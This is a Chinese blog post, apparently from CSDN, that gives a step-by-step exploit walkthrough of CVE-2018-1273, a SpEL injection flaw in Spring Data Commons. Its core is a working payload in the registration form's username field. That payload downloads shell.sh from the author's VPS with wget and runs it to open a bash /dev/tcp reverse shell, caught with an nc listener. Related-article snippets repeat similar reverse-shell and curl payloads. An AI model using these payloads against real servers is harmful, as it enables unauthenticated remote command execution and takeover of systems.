spring 代码执行 (CVE-2018-1273)

最新推荐文章于 2024-09-23 17:23:04 发布
最新推荐文章于 2024-09-23 17:23:04 发布
阅读量361 收藏 4
点赞数 3
分类专栏: # 命令执行 文章标签: spring java 后端
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_23003811/article/details/140496809
版权

一、漏洞概述

Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。

二、影响范围

Spring Data Commons 1.13 – 1.13.10 (Ingalls SR10)
Spring Data REST 2.6 – 2.6.10 (Ingalls SR10)
Spring Data Commons 2.0 to 2.0.5 (Kay SR5)
Spring Data REST 3.0 – 3.0.5 (Kay SR5)

三、访问页面

四、漏洞复现

1、看到访问页面,一般都会进行目录扫描,获得了一个usres目录

2、注册账号,任意填写使用burp抓包。

3、构造payload

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("命令执行")]=&password=&repeatedPassword=

4、在自己的vps服务器创一个shell.sh文件,内容为反弹连接

bash -i >& /dev/tcp/91.208.73.100/7777 0>&1

5、打开vps服务器临时web服务器,这样就可以通过91.208.73.100:7777/shell.sh访问到我们制作好的文件。

python3 -m http.server 7777

6、使用burp发送数据包,在被攻击的服务器上下载我们的shell。

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("wget /tmp http://91.208.73.100:7777/shell.sh")]=&password=&repeatedPassword=

vps服务器上有回包说明下载成功了。

7、使用burp发送数据包,在被攻击的服务器上执行下载好的shell

username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("bash /shell.sh")]=&password=&repeatedPassword=

8、此时我们要在vps服务器上监听

nc -lvp 7777

风中追风-fzzf
关注
专栏目录
[Java安全]Spring Data Commons之CVE-2018-1273
snowlyzz的博客
02-08 719
CVE-2018-1273看漏洞分析
漏洞复现—Spring CVE-2016-4977/CVE-2017-4971/CVE-2017-8046/CVE-2018-1270/CVE-2018-1273
weixin_45556536的博客
12-24 1402
CVE-2017-4971 // 注意反弹的端口和IP修改,反弹语句需要url编码 &_(new+java.lang.ProcessBuilder("bash","-c","bash+-i+>%26+/dev/tcp/攻击机IP/端口号+0>%261")).start()=vulhub
春秋云镜 CVE-2018-1273
qq_22002773的博客
09-04 234
春秋云镜 CVE-2018-1273
spring 代码执行(CVE-2018-1273)
最新发布
2301_78031880的博客
09-23 183
(3)进入终端查看,可以看到成功写入。(1)填写注册信息,burp抓包。
spring:CVE-2018:1273
weixin_69670995的博客
05-18 565
使用浏览器访问users,并输入随便东西。在kali上使用vim新建测试txt文件。使用dirsearch工具进行目录扫描。使用python3开启临时http。修改payload,让靶机执行木马。修改payload,提升木马权限。发到重发器,并修改post传参。返回200,上传txt文件成功。修改paylaod,上传木马。执行成功,返回靶机shell。使用burp抓包,点击注册。返回200,上传成功。
[Vulfocus解题系列]spring 代码执行CVE-2018-1273
00勇士王子的博客
01-05 3395
简介 Spring Expression Language是一个功能强大的表达式 语言支持查询和在运行时操作一个对象图。 攻击者可以在未获得授权的情况下,将精心制作的请求参数注入到存在该漏洞的服务器上,从而发起远程代码执行攻击。 复现过程 使用在线靶场 抓包 改包,将data数据改为下面的payload username[#this.getClass().forName("java.lang.Runtime").getRuntime().exec("curl http://m9c5f3.ceye.io/
[春秋云镜]CVE-2018-1273
niubi707的博客
12-02 5389
[春秋云镜]CVE-2018-1273Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。
CVE-2018-3191利用exp
01-08
标题"CVE-2018-3191利用exp"涉及的是一个针对WebLogic服务器的安全漏洞,该漏洞被命名为CVE-2018-3191。这个漏洞是由于WebLogic服务器中Spring框架的一个组件处理JNDI(Java Naming and Directory Interface)注入...
poc-cve-2018-1273:CVE-2018-1273的POC
05-15
CVE-2018-1273 Spring Data Commons(1.13至1.13.10之前的版本,2.0至2.0.5的版本以及较早的不受支持的版本)包含由于特殊元素的不正确中和导致的属性绑定器漏洞。 未经身份验证的远程恶意用户(或攻击者)可以针对...
linux漏洞分析,Spring-data-commons(CVE-2018-1273)漏洞分析
weixin_39830303的博客
05-13 879
前言CVE-2018-1273Spring-data-commons近期爆出的一个可远程执行代码的漏洞,为了了解更多细节,本文将从漏洞的成因,漏洞的判定以及漏洞的利用三个方面来进行详细说明。漏洞的成因当用户在项目中利用了Spring-data的相关web特性对用户的输入参数进行自动匹配的时候,会将用户提交的form表单的key值作为Spel的执行内容,而这一步就是本次漏洞的爆发点。漏洞的判定...
[JAVA安全]Spring Messaging之CVE-2018-1270
snowlyzz的博客
02-19 924
SpEL注入漏洞
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
weixin_42786460的博客
09-16 423
Spring Data Commons远程命令执行漏洞_CVE-2018-1273(反序列Runtime方法)
Spring Data Commons远程命令执行漏洞复现(CVE-2018-1273
wutiangui的博客
09-10 915
下载文件请求包:username[#this.getClass().forName(“java.lang.Runtime”).getRuntime().exec(“/usr/bin/wget -O /tmp/1.sh http://192.168.155.2:8081/shell.sh”)]&password=test&repeatedPassword=test。访问http://192.168.25.128:8080/users,注册,BP抓包。在sh文件所在目录开启http服务。2.开启http服务。
spring(CVE-2018-1273)远程代码执行漏洞复现
热门推荐
勤劳的码农的博客
03-12 1万+
Spring Data 是Spring框架中提供底层数据访问的项目模块,Spring Data Commons 是一个共用的基础模块。此模块对特殊属性处理时会使用SpEl表达式,导致攻击者可以通过构造特殊的URL请求,造成服务端远程代码执行。在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。Spring在补丁中使用更加安全的SimpleEvaluationContext替换了StandardEvaluationContext。
001--什么是SpringData
weixin_42288943的博客
04-17 188
1.参考网址:https://blog.csdn.net/zgf19930504/article/details/50537198 2.核心内容: ** Spring Data **是Spring 的一个子项目, 旨在统一和简化对各类型持久化存储, 而不拘泥于是关系型数据库还是NoSQL 数据存储。无论是哪种持久化存储, 数据访问对象(或称作为DAO,...
cve-2018-1273 Spring Expression Language 漏洞分析
whatday的专栏
07-31 1048
目录 0x00 背景 x01 漏洞影响 受影响的范围 0x02 SpEL 类类型表达式 类实例化 变量和函数的使用 0x03 SpEL调试 0x04 实战分析 CVE-2018-1273 攻击Exploit的诞生 0x00 背景 最近Spring框架不大太平,接连爆出来多个RCE远程代码执行CVE漏洞,其中有CVE-2018-1270,CVE-2018-1273,通过对造成漏洞部分代码进行分析,发现都是因为滥用SpEL的StandardEvaluationContext。 x0
漏洞复现之CVE-2018-1273 Spring Data Commons 远程命令执行
白帽子九一
04-27 1044
漏洞背景 Spring Data是一个用于简化数据库访问,并支持云服务的开源框架,Spring Data Commons是Spring Data下所有子项目共享的基础框架。Spring Data Commons 在2.0.5及以前版本中,存在一处SpEL表达式注入漏洞,攻击者可以注入恶意SpEL表达式以执行任意命令。 实验环境 攻击机:Win 10 靶场:kali中搭建vulhub靶场 https://github.com/vulhub/vulhub/spring/CVE-2018-1273 影响版本 Sp
Spring框架远程代码执行漏洞 CVE-2022-22965 的紧急修复指南
资源摘要信息:"CVE-2022-22965是关于Spring框架中的一个远程代码执行漏洞。该漏洞存在于Spring相关框架中,允许攻击者通过特定的参数绑定机制远程执行代码。此漏洞在2022年3月31日由Spring官方通报,并已在Spring...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值